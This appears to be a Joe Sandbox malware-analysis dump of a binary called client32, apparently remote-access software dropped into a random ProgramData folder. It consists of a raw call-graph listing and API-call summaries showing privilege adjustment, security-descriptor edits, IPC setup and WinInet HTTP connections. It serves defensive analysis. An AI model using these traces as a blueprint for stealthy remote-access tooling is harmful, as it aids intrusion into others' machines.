93849->93850 93879 111425e7 93850->93879 93851 11142915 93852 110d1930 268 API calls 93851->93852 93854 11142cf9 93851->93854 93855 11142933 93852->93855 93853 11061320 274 API calls 93853->93879 93861 11061170 69 API calls 93854->93861 93858 1105e820 79 API calls 93855->93858 93856 11142905 93857 11147060 std::locale::facet::_Facet_Register 21 API calls 93856->93857 93857->93851 93860 11142970 93858->93860 93859 11147060 21 API calls std::locale::facet::_Facet_Register 93859->93879 93862 11142abd 93860->93862 93864 11061290 268 API calls 93860->93864 93863 11142d52 93861->93863 93866 11061a70 274 API calls 93862->93866 93865 11061170 69 API calls 93863->93865 93869 1114298e 93864->93869 93865->93870 93867 11142ad9 93866->93867 93943 110684e0 298 API calls std::locale::facet::_Facet_Register 93867->93943 93868 11132900 86 API calls 93868->93879 93871 11061320 274 API calls 93869->93871 93870->93820 93880 1114299d 93871->93880 93873 111429d2 93874 11061290 268 API calls 93873->93874 93877 111429e8 93874->93877 93875 11142b03 93878 11142b33 EnterCriticalSection 93875->93878 93904 11142b07 93875->93904 93876 11147060 std::locale::facet::_Facet_Register 21 API calls 93876->93880 93882 11061320 274 API calls 93877->93882 93883 11060f50 271 API calls 93878->93883 93879->93851 93879->93853 93879->93856 93879->93859 93879->93868 93885 11081f20 86 API calls std::locale::facet::_Facet_Register 93879->93885 93888 11081e70 86 API calls 93879->93888 93880->93873 93880->93876 93881 11061320 274 API calls 93880->93881 93881->93880 93890 111429f8 93882->93890 93884 11142b50 93883->93884 93887 11061a70 274 API calls 93884->93887 93885->93879 93893 11142b66 93887->93893 93888->93879 93889 11142a31 93891 11061290 268 API calls 93889->93891 93890->93889 93894 11147060 std::locale::facet::_Facet_Register 21 API calls 93890->93894 93903 11061320 274 API calls 93890->93903 93895 11142a47 93891->93895 93892 11142b7a LeaveCriticalSection 93898 11142bce 93892->93898 93899 11142b8e 
93892->93899 93893->93892 93897 1102b140 283 API calls 93893->93897 93894->93890 93896 11061320 274 API calls 93895->93896 93914 11142a56 93896->93914 93901 11142b77 93897->93901 93902 11134310 273 API calls 93898->93902 93899->93898 93907 11147060 std::locale::facet::_Facet_Register 21 API calls 93899->93907 93901->93892 93906 11142bd8 93902->93906 93903->93890 93904->93878 93944 11051360 354 API calls 4 library calls 93904->93944 93945 110684e0 298 API calls std::locale::facet::_Facet_Register 93904->93945 93905 11142a91 93909 11061170 69 API calls 93905->93909 93908 110d1930 268 API calls 93906->93908 93910 11142b9c 93907->93910 93912 11142be6 93908->93912 93913 11142a9f 93909->93913 93918 11142010 387 API calls 93910->93918 93911 11147060 std::locale::facet::_Facet_Register 21 API calls 93911->93914 93946 110d0170 265 API calls std::locale::facet::_Facet_Register 93912->93946 93915 11061170 69 API calls 93913->93915 93914->93905 93914->93911 93916 11061320 274 API calls 93914->93916 93917 11142aae 93915->93917 93916->93914 93920 11061170 69 API calls 93917->93920 93921 11142ba7 93918->93921 93920->93862 93921->93898 93923 11147060 std::locale::facet::_Facet_Register 21 API calls 93921->93923 93922 11142c1c 93937 11142c9f 93922->93937 93947 110d1530 265 API calls 93922->93947 93924 11142bc0 93923->93924 93927 11027200 836 API calls 93924->93927 93925 110d0a10 265 API calls 93928 11142cdb 93925->93928 93927->93898 93932 110d0a10 265 API calls 93928->93932 93932->93854 93937->93925 93943->93875 93944->93904 93945->93904 93946->93922 93949 1112d87c 93948->93949 93950 1112d8b7 93949->93950 93951 1112d8a4 93949->93951 93972 1106c340 298 API calls 93950->93972 93953 11147af0 269 API calls 93951->93953 93954 1112d8af 93953->93954 93955 1112d903 93954->93955 93956 11142e60 std::locale::facet::_Facet_Register 265 API calls 93954->93956 93955->93738 93955->93739 93956->93955 93957->93717 93958->93725 93959->93730 93960->93736 93961->93743 93962->93742 93963->93759 
93964->93762 93965->93772 93966->93757 93967->93779 93968->93752 93969->93764 93970->93755 93971->93774 93972->93954 93973 11135c20 93974 11135c29 93973->93974 93980 11135c58 93973->93980 93975 11145ef0 std::locale::facet::_Facet_Register 90 API calls 93974->93975 93976 11135c2e 93975->93976 93977 11133b00 274 API calls 93976->93977 93976->93980 93978 11135c37 93977->93978 93979 1105e820 79 API calls 93978->93979 93978->93980 93979->93980 93981 11137300 93982 1113736d 93981->93982 93983 1113730c 93981->93983 93984 1105e820 79 API calls 93983->93984 93986 11137325 93984->93986 93985 1113734d 93985->93982 94001 1112f930 144 API calls std::locale::facet::_Facet_Register 93985->94001 93986->93982 93986->93985 93989 1112fc70 93986->93989 93990 1112fc7d 93989->93990 93995 1112fd09 93989->93995 93991 1112fcb8 93990->93991 94002 111165c0 93990->94002 93994 1112fcd2 93991->93994 94066 1111c990 93991->94066 93994->93995 93997 1105e820 79 API calls 93994->93997 93995->93985 93996 1112fca9 94048 11116880 93996->94048 93999 1112fcf4 93997->93999 93999->93995 94181 11116d50 93999->94181 94001->93982 94003 111165e4 94002->94003 94004 1111685a 94002->94004 94006 1111677d SystemParametersInfoA 94003->94006 94007 111165ec 94003->94007 94005 11145ef0 std::locale::facet::_Facet_Register 90 API calls 94004->94005 94008 11116868 94005->94008 94010 111167a8 94006->94010 94009 111166e0 94007->94009 94017 11145ef0 std::locale::facet::_Facet_Register 90 API calls 94007->94017 94011 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94008->94011 94012 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94009->94012 94013 11116833 SystemParametersInfoA 94010->94013 94014 111167bc 94010->94014 94015 11116876 94011->94015 94016 111166ef 94012->94016 94019 11162bb7 
__ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94013->94019 94018 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 94014->94018 94015->93996 94016->93996 94021 11116615 94017->94021 94026 111167e4 94018->94026 94020 11116854 94019->94020 94020->93996 94022 111166f5 SystemParametersInfoA 94021->94022 94028 11116627 94021->94028 94024 1111676e SystemParametersInfoA 94022->94024 94025 1111670e 94022->94025 94023 11116814 RegCloseKey 94027 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94023->94027 94024->94009 94029 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 94025->94029 94026->94023 94193 111648ed 79 API calls __isdigit_l 94026->94193 94031 1111682d 94027->94031 94028->94009 94032 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 94028->94032 94033 1111673a 94029->94033 94031->93996 94035 11116650 94032->94035 94036 111166d9 RegCloseKey 94033->94036 94192 111648ed 79 API calls __isdigit_l 94033->94192 94034 111167fe 94034->94023 94037 11116805 SystemParametersInfoA 94034->94037 94038 11116678 94035->94038 94039 11116666 SystemParametersInfoA 94035->94039 94036->94009 94037->94023 94040 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 94038->94040 94039->94038 94042 111166a4 94040->94042 94042->94036 94191 111648ed 79 API calls __isdigit_l 94042->94191 94043 11116754 94043->94036 94044 1111675f SystemParametersInfoA 94043->94044 94044->94036 94046 111166be 94046->94036 94047 111166c5 SystemParametersInfoA 94046->94047 94047->94036 94049 11145ef0 std::locale::facet::_Facet_Register 90 API calls 94048->94049 94050 1111689e 94049->94050 94051 111168c5 94050->94051 94053 111168a8 94050->94053 94056 11145c70 std::locale::facet::_Facet_Register 90 API calls 94050->94056 94052 111168d4 CoInitialize CoCreateInstance 94051->94052 94051->94053 94054 
11116904 LoadLibraryA 94052->94054 94065 111168f9 94052->94065 94055 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94053->94055 94057 11116920 GetProcAddress 94054->94057 94054->94065 94058 111168b6 94055->94058 94056->94051 94059 11116930 SHGetSettings 94057->94059 94060 11116944 FreeLibrary 94057->94060 94058->93991 94059->94060 94060->94065 94061 111169e1 CoUninitialize 94062 111169e7 94061->94062 94063 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94062->94063 94064 111169f6 94063->94064 94064->93991 94065->94061 94065->94062 94067 1111c9b0 94066->94067 94068 1111c9c3 94066->94068 94071 1105e820 79 API calls 94067->94071 94069 1111ca03 SystemParametersInfoA 94068->94069 94070 1111c9cf 94068->94070 94072 1111ca0c 94068->94072 94069->94072 94070->94072 94073 11145ef0 std::locale::facet::_Facet_Register 90 API calls 94070->94073 94071->94068 94074 1111ca38 94072->94074 94078 1105e820 79 API calls 94072->94078 94077 1111c9dc 94073->94077 94075 1111ca44 94074->94075 94076 1111ca6b SystemParametersInfoA 94074->94076 94079 1111ca7d 94074->94079 94075->94079 94082 1111ca56 SystemParametersInfoA 94075->94082 94076->94079 94080 1111c9e0 GetSystemMetrics 94077->94080 94081 1111c9ec 94077->94081 94078->94074 94083 1111ca9c 94079->94083 94085 1105e820 79 API calls 94079->94085 94080->94072 94080->94081 94081->94072 94084 1111c9f1 SystemParametersInfoA 94081->94084 94082->94079 94086 1111caa8 94083->94086 94087 1111cacc SystemParametersInfoA 94083->94087 94088 1111cadb 94083->94088 94084->94072 94085->94083 94086->94088 94089 1111cab7 SystemParametersInfoA 94086->94089 94087->94088 94090 1111cafa 94088->94090 94091 1105e820 79 API calls 94088->94091 94089->94088 94092 1111cb06 94090->94092 94093 1111cb2a SystemParametersInfoA 94090->94093 94094 1111cb39 94090->94094 94091->94090 94092->94094 
94095 1111cb15 SystemParametersInfoA 94092->94095 94093->94094 94096 1111cb58 94094->94096 94099 1105e820 79 API calls 94094->94099 94095->94094 94097 1111cb64 94096->94097 94098 1111cb88 SystemParametersInfoA 94096->94098 94100 1111cb97 94096->94100 94097->94100 94101 1111cb73 SystemParametersInfoA 94097->94101 94098->94100 94099->94096 94102 1111cbb6 94100->94102 94103 1105e820 79 API calls 94100->94103 94101->94100 94104 1111cbc2 94102->94104 94105 1111cbe6 SystemParametersInfoA 94102->94105 94106 1111cbf5 94102->94106 94103->94102 94104->94106 94107 1111cbd1 SystemParametersInfoA 94104->94107 94105->94106 94108 1111cc14 94106->94108 94109 1105e820 79 API calls 94106->94109 94107->94106 94110 1111cc20 94108->94110 94111 1111cc44 SystemParametersInfoA 94108->94111 94112 1111cc53 94108->94112 94109->94108 94110->94112 94113 1111cc2f SystemParametersInfoA 94110->94113 94111->94112 94114 1111cc72 94112->94114 94115 1105e820 79 API calls 94112->94115 94113->94112 94116 1111cca2 SystemParametersInfoA 94114->94116 94117 1111cc7e 94114->94117 94118 1111ccb1 94114->94118 94115->94114 94116->94118 94117->94118 94119 1111cc8d SystemParametersInfoA 94117->94119 94120 1111ccd0 94118->94120 94121 1105e820 79 API calls 94118->94121 94119->94118 94122 1111cd00 SystemParametersInfoA 94120->94122 94123 1111ccdc 94120->94123 94124 1111cd0f 94120->94124 94121->94120 94122->94124 94123->94124 94125 1111cceb SystemParametersInfoA 94123->94125 94126 1111cd2e 94124->94126 94127 1105e820 79 API calls 94124->94127 94125->94124 94128 1111cd65 94126->94128 94129 1111cd3a 94126->94129 94131 1111cd5c 94126->94131 94127->94126 94194 11116e30 94128->94194 94129->94131 94133 11116e30 4 API calls 94129->94133 94132 1111cd9a 94131->94132 94134 1105e820 79 API calls 94131->94134 94135 1111cda6 94132->94135 94136 1111cdca SystemParametersInfoA 94132->94136 94137 1111cdd9 94132->94137 94133->94131 94134->94132 94135->94137 94138 1111cdb5 SystemParametersInfoA 94135->94138 94136->94137 94139 1111cdf8 
94137->94139 94142 1105e820 79 API calls 94137->94142 94138->94137 94140 1111ce25 SystemParametersInfoA 94139->94140 94141 1111ce04 94139->94141 94144 1111ce31 94139->94144 94140->94144 94143 1111ce13 SystemParametersInfoA 94141->94143 94141->94144 94142->94139 94143->94144 94145 1105e820 79 API calls 94144->94145 94149 1111ce50 94144->94149 94145->94149 94146 1111ce83 94205 11116ee0 94146->94205 94147 1111ce5c 94150 1111ce7a 94147->94150 94151 11116ee0 4 API calls 94147->94151 94149->94146 94149->94147 94149->94150 94152 1111ceba 94150->94152 94153 1105e820 79 API calls 94150->94153 94151->94150 94154 1111cec6 94152->94154 94155 1111ceed 94152->94155 94157 1111cee4 94152->94157 94153->94152 94154->94157 94158 11116f00 4 API calls 94154->94158 94208 11116f00 94155->94208 94159 1111cf1e 94157->94159 94160 1105e820 79 API calls 94157->94160 94158->94157 94161 1111cf51 94159->94161 94162 1111cf2a 94159->94162 94164 1111cf48 94159->94164 94160->94159 94163 11116f00 4 API calls 94161->94163 94162->94164 94166 11116f00 4 API calls 94162->94166 94163->94164 94165 1111cf82 94164->94165 94167 1105e820 79 API calls 94164->94167 94168 1111cfb5 94165->94168 94169 1111cf8e 94165->94169 94171 1111cfac 94165->94171 94166->94164 94167->94165 94170 11116f00 4 API calls 94168->94170 94169->94171 94173 11116f00 4 API calls 94169->94173 94170->94171 94172 1111cfe6 94171->94172 94174 1105e820 79 API calls 94171->94174 94175 1111cff2 94172->94175 94176 1111d01e 94172->94176 94178 1111d030 94172->94178 94173->94171 94174->94172 94175->94178 94179 11116f00 4 API calls 94175->94179 94177 11116f00 4 API calls 94176->94177 94177->94178 94178->93994 94180 1111d010 94179->94180 94180->93994 94182 11145ef0 std::locale::facet::_Facet_Register 90 API calls 94181->94182 94183 11116d5b 94182->94183 94184 11116de3 94183->94184 94185 11116d63 RegOpenKeyExA 94183->94185 94184->93995 94185->94184 94186 11116d8c 94185->94186 94187 11116dc3 RegSetValueExA RegCloseKey 94186->94187 94188 11116d93 
94186->94188 94187->94184 94189 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 94188->94189 94190 11116db0 RegCloseKey 94189->94190 94190->93995 94191->94046 94192->94043 94193->94034 94196 11116e54 94194->94196 94195 11116ecb 94195->94131 94196->94195 94197 11116e68 94196->94197 94198 11116e8d 94196->94198 94199 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 94197->94199 94200 11116eb2 RegSetValueExA 94198->94200 94202 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 94198->94202 94201 11116e7d RegCloseKey 94199->94201 94203 11116ec4 RegCloseKey 94200->94203 94201->94131 94204 11116eab 94202->94204 94203->94195 94204->94200 94204->94203 94206 11116e30 4 API calls 94205->94206 94207 11116efb 94206->94207 94207->94150 94209 11116e30 4 API calls 94208->94209 94210 11116f1b 94209->94210 94210->94157 94211 1115cca0 94212 1115ccb4 94211->94212 94213 1115ccac 94211->94213 94223 1116406b 94212->94223 94216 1115ccd4 94218 1115ce00 94219 11163aa5 _free 66 API calls 94218->94219 94220 1115ce28 94219->94220 94221 1115ccf1 94221->94218 94222 1115cde4 SetLastError 94221->94222 94222->94221 94224 11170fc4 __calloc_crt 66 API calls 94223->94224 94225 11164085 94224->94225 94229 1115ccc8 94225->94229 94247 1116a1af 66 API calls __getptd_noexit 94225->94247 94227 11164098 94227->94229 94248 1116a1af 66 API calls __getptd_noexit 94227->94248 94229->94216 94229->94218 94230 1115c8e0 CoInitializeSecurity CoCreateInstance 94229->94230 94231 1115c955 wsprintfW SysAllocString 94230->94231 94232 1115cad4 94230->94232 94237 1115c99b 94231->94237 94233 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94232->94233 94235 1115cb00 94233->94235 94234 1115cac1 SysFreeString 94234->94232 94235->94221 94236 1115caa9 94236->94234 94237->94234 94237->94236 94237->94237 94238 1115ca2c 94237->94238 94239 1115ca1a wsprintfW 94237->94239 94249 110978f0 94238->94249 

Control-flow Graph

[Control-flow graph 774, entry block 1109e5b0-1109e612; legend: Executed / Not Executed]
APIs
  • Part of subcall function 1109D860: GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,986DAFD2,00080000,00000000,?), ref: 1109D88D
  • Part of subcall function 1109D860: OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
  • Part of subcall function 1109D860: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
  • Part of subcall function 1109D860: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
• LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,986DAFD2,00080000,00000000,?), ref: 1109E645
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E65E
• SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E669
• GetVersionExA.KERNEL32(?), ref: 1109E680
• GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E6EE
• SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E703
• FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E714
• CreateFileMappingA.KERNEL32 ref: 1109E750
• GetLastError.KERNEL32 ref: 1109E75D
• LocalFree.KERNEL32(?), ref: 1109E786
                                                                                                • LocalFree.KERNEL32(?), ref: 1109E793
                                                                                                • GetLastError.KERNEL32 ref: 1109E7B0
                                                                                                • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E7CE
                                                                                                • LocalFree.KERNEL32(?), ref: 1109E7F9
                                                                                                • LocalFree.KERNEL32(?), ref: 1109E806
                                                                                                  • Part of subcall function 1109D7D0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 1109D7D8
                                                                                                  • Part of subcall function 1109D810: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA,00000000,?,1109E6BC,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D824
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E832
                                                                                                • LocalFree.KERNEL32(?), ref: 1109E8FB
                                                                                                • LocalFree.KERNEL32(?), ref: 1109E908
                                                                                                • _memset.LIBCMT ref: 1109E920
                                                                                                • GetTickCount.KERNEL32 ref: 1109E928
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 1109E9D4
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E9EF
                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109EA3B
                                                                                                • GetLastError.KERNEL32 ref: 1109EA44
                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EA4B
                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EA80
                                                                                                • GetLastError.KERNEL32 ref: 1109EA89
                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EA90
                                                                                                • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109EAC6
                                                                                                • GetLastError.KERNEL32 ref: 1109EACF
                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EAD6
                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EB0B
                                                                                                • GetLastError.KERNEL32 ref: 1109EB1A
                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EB1D
                                                                                                • LocalFree.KERNEL32(?), ref: 1109EB45
                                                                                                • LocalFree.KERNEL32(?), ref: 1109EB52
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1109EB83
                                                                                                • CreateThread.KERNEL32(00000000,00002000,Function_0009E140,00000000,00000000,00000030), ref: 1109EB9D
                                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBCC
                                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBD2
                                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBD8
                                                                                                • SetEvent.KERNEL32(?), ref: 1109EBDE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                • API String ID: 3291243470-2792520954
                                                                                                • Opcode ID: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                                • Instruction ID: a3fd055aacadca8d823d44ca49761fd5d24e706f53ed4dbc48f97bf713fa71f6
                                                                                                • Opcode Fuzzy Hash: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                                • Instruction Fuzzy Hash: A612B2B5E0026D9FEB24DF60CDD4EAAB7BAFB88304F0049A9E51D97640D671AD84CF50

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(WinInet.dll), ref: 11029BE5
                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
                                                                                                • InternetCloseHandle.WININET(000000FF), ref: 11029C8D
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029C93
                                                                                                • _malloc.LIBCMT ref: 11029CB7
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
                                                                                                • GetLastError.KERNEL32 ref: 11029CF2
                                                                                                • _free.LIBCMT ref: 11029CFE
                                                                                                • _malloc.LIBCMT ref: 11029D07
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
                                                                                                • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
                                                                                                • InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D84
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D91
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D9B
                                                                                                • _free.LIBCMT ref: 11029DA5
                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029E3E
                                                                                                • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
                                                                                                • InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029EA3
                                                                                                • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
                                                                                                • HttpOpenRequestA.WININET(?,GET,1119A6D8,00000000,00000000,00000000,8040F000,00000000), ref: 11029EEF
                                                                                                • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable,?), ref: 1102A083
                                                                                                • SetLastError.KERNEL32(00000078), ref: 1102A150
                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle,?,1117FC4B), ref: 1102A1A2
                                                                                                • SetLastError.KERNEL32(00000078), ref: 1102A1B9
                                                                                                • FreeLibrary.KERNEL32(?), ref: 1102A1CA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$ErrorLast$Internet$FreeLibraryOpen_free_malloc$CloseConnectHandleHeapHttpLoadRequest
                                                                                                • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                • API String ID: 2589145992-913974648
                                                                                                • Opcode ID: 4120dbda5f7b8a65a157389820b932fd852e5028f54e685182759e8909351907
                                                                                                • Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
                                                                                                • Opcode Fuzzy Hash: 4120dbda5f7b8a65a157389820b932fd852e5028f54e685182759e8909351907
                                                                                                • Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                  • Part of subcall function 69CE2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 69CE2ACB
                                                                                                  • Part of subcall function 69CE2A90: _strrchr.LIBCMT ref: 69CE2ADA
                                                                                                  • Part of subcall function 69CE2A90: _strrchr.LIBCMT ref: 69CE2AEA
                                                                                                  • Part of subcall function 69CE2A90: wsprintfA.USER32 ref: 69CE2B05
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • LoadLibraryA.KERNEL32(WinInet.dll), ref: 69CF7057
                                                                                                • InitializeCriticalSection.KERNEL32(69D2B898), ref: 69CF70DF
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 69CF70EF
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 69CF7115
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 69CF713B
                                                                                                • WSAStartup.WSOCK32(00000101,69D2B91A), ref: 69CF7167
                                                                                                • _malloc.LIBCMT ref: 69CF71A3
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                • _memset.LIBCMT ref: 69CF71D3
                                                                                                • _calloc.LIBCMT ref: 69CF7214
                                                                                                • _malloc.LIBCMT ref: 69CF728B
                                                                                                • _memset.LIBCMT ref: 69CF72C1
                                                                                                • _malloc.LIBCMT ref: 69CF72CD
                                                                                                • _memset.LIBCMT ref: 69CF7303
                                                                                                • GetTickCount.KERNEL32 ref: 69CF7361
                                                                                                • CreateThread.KERNEL32(00000000,00004000,69CF6BA0,00000000,00000000,69D2BACC), ref: 69CF737E
                                                                                                • SetThreadPriority.KERNEL32(00000000,00000001), ref: 69CF73AC
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\i99ekubc\Support\,00000104), ref: 69CF7430
                                                                                                • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\ProgramData\i99ekubc\Support\pci.ini), ref: 69CF74B0
                                                                                                • GetModuleHandleA.KERNEL32(nsmtrace), ref: 69CF74C0
                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 69CF7566
                                                                                                • timeBeginPeriod.WINMM(00000001), ref: 69CF7573
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
